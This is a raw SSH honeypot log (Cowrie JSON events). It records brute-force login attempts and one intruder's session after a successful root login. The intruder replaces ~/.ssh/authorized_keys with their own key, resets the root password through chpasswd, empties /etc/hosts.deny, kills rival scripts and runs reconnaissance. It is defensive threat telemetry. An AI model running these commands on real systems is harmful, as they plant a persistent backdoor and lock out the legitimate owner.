{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:10:05.739314Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.login.success","username":"root","password":"888999","message":"login attempt [root/888999] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:10:06.293874Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:07.528165Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:10:07.529170Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:10:07.530255Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:07.715064Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:08.591515Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:10:08.592271Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56104,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef0b7113f039","protocol":"ssh","message":"New connection: 212.227.235.229:56104 (1.2.3.4:22) [session: ef0b7113f039]","sensor":"my-vps","timestamp":"2025-08-26T10:10:09.386435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:10:09.406129Z","src_ip":"212.227.235.229","session":"ef0b7113f039"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T10:10:09.724224Z","src_ip":"212.227.235.229","session":"ef0b7113f039"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:10:10.003880Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:10.006080Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.login.failed","username":"student","password":"111111","message":"login attempt [student/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T10:10:10.816096Z","src_ip":"212.227.235.229","session":"ef0b7113f039"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:12.244622Z","src_ip":"212.227.235.229","session":"ef0b7113f039"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:26.197043Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T10:10:26.197906Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:26.964491Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:27.203288Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"echo \"root:yTLdfnaP2P9M\"|chpasswd|bash","message":"CMD: echo \"root:yTLdfnaP2P9M\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T10:10:27.203969Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f34f5ad71c10d18136a2ee5db6b6b0e47be2360b07d2122ff8c568f895903b82","size":21,"shasum":"f34f5ad71c10d18136a2ee5db6b6b0e47be2360b07d2122ff8c568f895903b82","duplicate":false,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f34f5ad71c10d18136a2ee5db6b6b0e47be2360b07d2122ff8c568f895903b82 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:28.771927Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:29.005642Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T10:10:29.006356Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T10:10:29.773922Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:29.774945Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:29.983707Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T10:10:29.984424Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:30.169930Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:31.426781Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T10:10:31.427594Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:32.411795Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:34.650975Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T10:10:34.651784Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T10:10:34.652441Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:34.845521Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:35.625337Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T10:10:35.626087Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:35.808583Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:37.080333Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T10:10:37.081043Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:37.845501Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:38.044614Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T10:10:38.045106Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:39.035703Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:40.480374Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T10:10:40.481148Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:40.664618Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:41.476755Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T10:10:41.477430Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:41.657977Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:44.049037Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T10:10:44.049751Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:44.234859Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:44.699608Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T10:10:44.700649Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:45.699849Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:45.897030Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T10:10:45.897961Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:46.086495Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:46.542790Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T10:10:46.543473Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:46.729807Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:10:47.981504Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T10:10:47.982753Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:48.169667Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.closed","duration":"43.7","message":"Connection lost after 43.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:48.171493Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":46836,"dst_ip":"1.2.3.4","dst_port":22,"session":"f00dfbd24b1f","protocol":"ssh","message":"New connection: 196.251.86.249:46836 (1.2.3.4:22) [session: f00dfbd24b1f]","sensor":"my-vps","timestamp":"2025-08-26T10:10:49.811102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:10:50.469609Z","src_ip":"196.251.86.249","session":"f00dfbd24b1f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[